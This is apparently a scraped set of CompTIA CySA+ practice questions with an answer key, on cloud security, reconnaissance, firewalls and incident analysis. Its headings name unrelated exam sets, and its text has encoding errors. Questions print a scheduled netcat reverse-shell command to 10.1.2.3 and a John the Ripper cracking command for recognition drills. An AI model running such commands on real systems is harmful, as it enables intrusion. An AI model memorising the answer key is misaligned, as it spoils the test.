CompTIA CySA+ Set 14

The company that Lauren works for is making significant investments in infrastructure-as-a-service hosting to replace its traditional data center. Members of her organizationÂ’s management have expressed concerns about data remanence when LaurenÂ’s team moves from one virtual host to another in their cloud service providerÂ’s environment. What should she instruct her team to do to avoid this concern?


Options are :

  • Zero-wipe drives before moving systems.
  • Use full-disk encryption.
  • Use data masking.
  • Span multiple virtual disks to fragment data.

Answer :Use full-disk encryption.

Lucca wants to prevent workstations on his network from attacking each other. If LuccaÂ’s corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B?


Options are :

  • An IPS
  • An IDS
  • A HIPS
  • A HIDS

Answer :A HIPS

Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action?


Options are :

  • #iptables-policy INPUT DROP
  • #iptables-policy SERVICE DROP
  • #iptables-policy OUTPUT DROP
  • #iptables-policy FORWARD DROP

Answer :#iptables-policy SERVICE DROP

220-802 CompTIA A+ Certification Practice Exam Set 12

The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment?


Options are :

  • Use a different scanning tool.
  • Rely on vendor testing and audits.
  • Engage a third-party tester.
  • Use a VPN to scan inside the vendorÂ’s security perimeter.

Answer :Rely on vendor testing and audits.

Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device?


Options are :

  • The MAC address
  • The OS flags
  • The systemÂ’s banner
  • The IP address

Answer :The MAC address

LauraÂ’s organization has been receiving a large amount of spam email sent specifically to the email addresses listed in her organizationÂ’s domain registrations. Which of the following techniques will help her organization limit this type of spam?


Options are :

  • DNS query rate limiting
  • CAPTCHAs
  • Using a proxy service
  • Blacklisting

Answer :Using a proxy service

LX0-104 CompTIA Linux+ [Powered by LPI] Exam Set 6

Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicly available vulnerability information, which of the following methods are best suited to performing this type of passive reconnaissance?


Options are :

  • Use the worldwide nmap database.
  • Search for his domain in Shodan.
  • Use the OpenVAS central vulnerability data repository.
  • Check against the CVE database for his domain.

Answer :Search for his domain in Shodan.

Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool?


Options are :

  • File transfer
  • Port scanner
  • Encrypted shell
  • Reverse shell

Answer :Encrypted shell

Which of the following tools can be used to passively gather the information required to generate a network topology map?


Options are :

  • Wireshark
  • nmap
  • SolarWinds Network Mapper
  • Nessus

Answer :Wireshark

CLO-001 CompTIA Cloud Essentials Certification Practice Test Set 5

Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches?


Options are :

  • Google whacks
  • SuperGoogles
  • Google dorks
  • Google gizmos

Answer :Google dorks

What type of control review will focus on change management as a major element in its assessment scope?


Options are :

  • Operational control review
  • Technical control review
  • Detective control review
  • Responsive control review

Answer :Operational control review

As part of her reconnaissance process for her organizationÂ’s internal security review, Olivia uses Shodan to search for hosts within her targetÂ’s IP range. She discovers the following Shodan entry listing for one of her targetÂ’s devices. What should she do with this information?


Options are :

  • Activate the incident response process.
  • Contact the device administrator.
  • Log in to validate the finding.
  • Nothing, because this is a false positive.

Answer :Contact the device administrator.

CompTIA Network+ 6 Certification Practice Exams - 2019 Set 15

Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this?


Options are :

  • Use sha1sum to generate a hash for the file and write a script to check it periodically.
  • Install and use Tripwire.
  • Periodically check the MAC information for the file using a script.
  • Encrypt the file and keep the key secret so the file cannot be modified.

Answer :Install and use Tripwire.

Selah has been tasked with gathering information to increase her penetration testing teamÂ’s understanding of their customerÂ’s Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs?


Options are :

  • nmap
  • theHarvester
  • Shodan
  • osint-ng

Answer :theHarvester

While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person?


Options are :

  • An encrypted RAT
  • A VPN application
  • A secure web browser
  • A base64-encoded packet transfer utility

Answer :A VPN application

CompTIA JK0-017 E2C Project+ Certification Practice Exam Set 4

Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file?


Options are :

  • grep
  • more
  • less
  • strings

Answer :strings

While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here:

0.0.0.0 symantec.com

0.0.0.0 mcafee.com

0.0.0.0 microsoft.com

0.0.0.0 kapersky.com

Why would the malware make this change?


Options are :

  • To redirect 0.0.0.0 to known sites
  • To prevent antivirus updates
  • To prevent other attackers from compromising the system
  • To enable remote access to the system

Answer :To prevent antivirus updates

Alice believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her userÂ’s desktop, she sees the following command on the screen:

[email protected]:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt

What is the user attempting to do?


Options are :

  • They are attempting to hash a file.
  • They are attempting to crack hashed passwords.
  • They are attempting to crack encrypted passwords.
  • They are attempting a pass-the-hash attack.

Answer :They are attempting to crack hashed passwords.

CompTIA Security+ Cert. (SY0-501) Practice Tests Set 6

Nmap provides a standardized way to name hardware and software that it detects. What is this called?


Options are :

  • CVE
  • HardwareEnum
  • CPE
  • GearScript

Answer :CPE

Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do?


Options are :

  • Search for use of privileged ports in sequential order.
  • Search for connections to ports in the /var/syslog directory.
  • Log all kernel messages to detect scans.
  • Install additional tools that can detect scans and send the logs to syslog.

Answer :Install additional tools that can detect scans and send the logs to syslog.

Alex wants to list all of the NetBIOS sessions open on a workstation. What command should he issue to do this?


Options are :

  • nbtstat -o
  • nbtstat -r
  • nbtstat -s
  • nbtstat -c

Answer :nbtstat -s

CompTIA JK0-017 E2C Project+ Certification Practice Exam Set 12

Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on.

root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n

message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activa

root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon

root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager --no-daemon

root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind

apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin

root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid

root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService

root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty --noclear tty1 linux

root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd --no-debug

root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3

root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd

root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]

Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd --user

Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)


Options are :

  • 508
  • 617
  • 846
  • 714

Answer :714

Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using?


Options are :

  • SYN cookies
  • ACK-ACK
  • TCP frogging
  • SYN replay

Answer :SYN cookies

What two phases of the NIST penetration testing cycle are often repeated during a test?


Options are :

  • Planning and discovery
  • Discovery and attack
  • Planning and attack
  • Discovery and reporting

Answer :Discovery and attack

CompTIA JK0-015 E2C Security+ Certification Practice Test Set 10

Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems?


Options are :

  • Enable host firewalls.
  • Install patches for those services.
  • Turn off the services for each appliance.
  • Place a network firewall between the devices and the rest of the network.

Answer :Place a network firewall between the devices and the rest of the network.

Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organizationÂ’s staff. If she wants to review the metadata from the photos, what tool can she use to do so?


Options are :

  • Strings
  • Exiftool
  • Wireshark
  • Stegdetect

Answer :Exiftool

LaurenÂ’s network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command:

at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe

What does it do?


Options are :

  • It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.
  • It uses the AT command to dial a remote host via NetBIOS.
  • It creates an HTTPS session to 10.1.2.3 every Friday at 8:30.
  • It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.

Answer :It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30.

CompTIA JK0-017 E2C Project+ Certification Practice Exam Set 1

While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this?


Options are :

  • Continue to search for other changes.
  • Run diff against the password file.
  • Immediately change her password.
  • Check the passwd binary against a known good version.

Answer :Check the passwd binary against a known good version.

While conducting reconnaissance of his own organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management?


Options are :

  • Self-signed certificates do not provide secure encryption for site visitors.
  • Self-signed certificates can be revoked only by the original creator.
  • Self-signed certificates will cause warnings or error messages.
  • None of the above

Answer :Self-signed certificates will cause warnings or error messages.

Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network?


Options are :

  • net use
  • net user
  • net group
  • net config

Answer :net use

CompTIA Cloud Essentials CLO-001 Certified Practice Exam Set 1

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions